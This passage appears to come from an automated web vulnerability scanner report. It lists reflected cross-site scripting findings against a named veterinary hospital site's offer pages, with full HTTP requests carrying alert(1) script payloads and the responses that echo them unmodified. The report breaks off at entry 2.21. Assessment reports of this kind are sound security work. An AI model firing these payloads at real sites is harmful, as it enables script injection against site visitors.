The value of the guid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c92"><script>alert(1)</script>166b7134f96 was submitted in the guid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EBe1c92"><script>alert(1)</script>166b7134f96&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%
2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:23 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=q7se0pt37ht32v8m7658nv8sm4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EBe1c92"><script>alert(1)</script>166b7134f96&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email
...[SNIP]...

2.15. http://www.vcahospitals.com/hanson/offer.html [ipaddress parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The value of the ipaddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5076b"><script>alert(1)</script>0fd887dd63 was submitted in the ipaddress parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.2435076b"><script>alert(1)</script>0fd887dd63&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2
526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:27 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=2b7fn6e43qheokrevppr4nsb17; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
n" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.2435076b"><script>alert(1)</script>0fd887dd63&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%
...[SNIP]...

2.16. http://www.vcahospitals.com/hanson/offer.html [js parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The value of the js request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b73"><script>alert(1)</script>c6690637939 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=f8b73"><script>alert(1)</script>c6690637939&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%
2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:31 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=lutm9p0j05v6cj6vrgj8qkh9p2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
ame="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=f8b73"><script>alert(1)</script>c6690637939&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHO
...[SNIP]...

2.17. http://www.vcahospitals.com/hanson/offer.html [lname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16722"><script>alert(1)</script>2ea3b2459e0 was submitted in the lname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=16722"><script>alert(1)</script>2ea3b2459e0&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%
2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:35 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=1o5ip8hjvq2ep4jaapvh990j72; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="lname" id="lname" type="text" size="30" class="req" maxlength="50" value="16722"><script>alert(1)</script>2ea3b2459e0" />
...[SNIP]...

2.18. http://www.vcahospitals.com/main/offer [ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the request parameter with an empty name (the leading ?= in the query string) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2cb5"><script>alert(1)</script>58d69b46a2b was submitted in that parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?=3d2cb5"><script>alert(1)</script>58d69b46a2b&state=FL&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:52 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?=3d2cb5"><script>alert(1)</script>58d69b46a2b&state=FL&guid=2505B0C6-B6AA-4144-878F-54873D353284" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.19. http://www.vcahospitals.com/main/offer [&optin parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the &optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98fd8"><script>alert(1)</script>96e4964cd43 was submitted in the &optin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?&optin=98fd8"><script>alert(1)</script>96e4964cd43&guid=207E973A-7104-40BA-9D0B-1AC946469C69&addr=&city=&date=1307084400&email=&fname=&formtype=CORP&ipaddress=173.193.214.243&lname=&newmex=0&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3f%26optin%3d%26guid%3d7FB081CC-4889-473B-8B55-80F871DF3718%26addr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3df59533da00809808fd0e36c2845bf10f%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253f%2526optin%253d1%2526guid%253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=3459b82500bdac55498a24f3778782f7&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3f%26optin%3d%26guid%3d1E049255-7B8D-4495-83A3-703E71767F97%26addr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253f%2526optin%253d1%2526guid%253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3db7ecd3da55c240fe68509bf0409ab225%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253f%2526optin%253d%2526guid%253d7FB081CC-4889-473B-8B55-80F871DF3718%2526addr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex
%253d0%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253df59533da00809808fd0e36c2845bf10f%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253f%252526optin%25253d1%252526guid%25253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com
Cookie: PHPSESSID=7dralunqm62g71gllr4tjahje0

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:00 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&optin=98fd8"><script>alert(1)</script>96e4964cd43&guid=207E973A-7104-40BA-9D0B-1AC946469C69&addr=&city=&date=1307084400&email=&fname=&formtype=CORP&ipaddress=173.193.214.243&lname=&newmex=0&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fw
...[SNIP]...

2.20. http://www.vcahospitals.com/main/offer [&state parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the &state request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0508"><script>alert(1)</script>c935fdcf07e was submitted in the &state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?&state=FLf0508"><script>alert(1)</script>c935fdcf07e&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:05 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FLf0508"><script>alert(1)</script>c935fdcf07e&guid=2505B0C6-B6AA-4144-878F-54873D353284" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.21. http://www.vcahospitals.com/main/offer [addr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

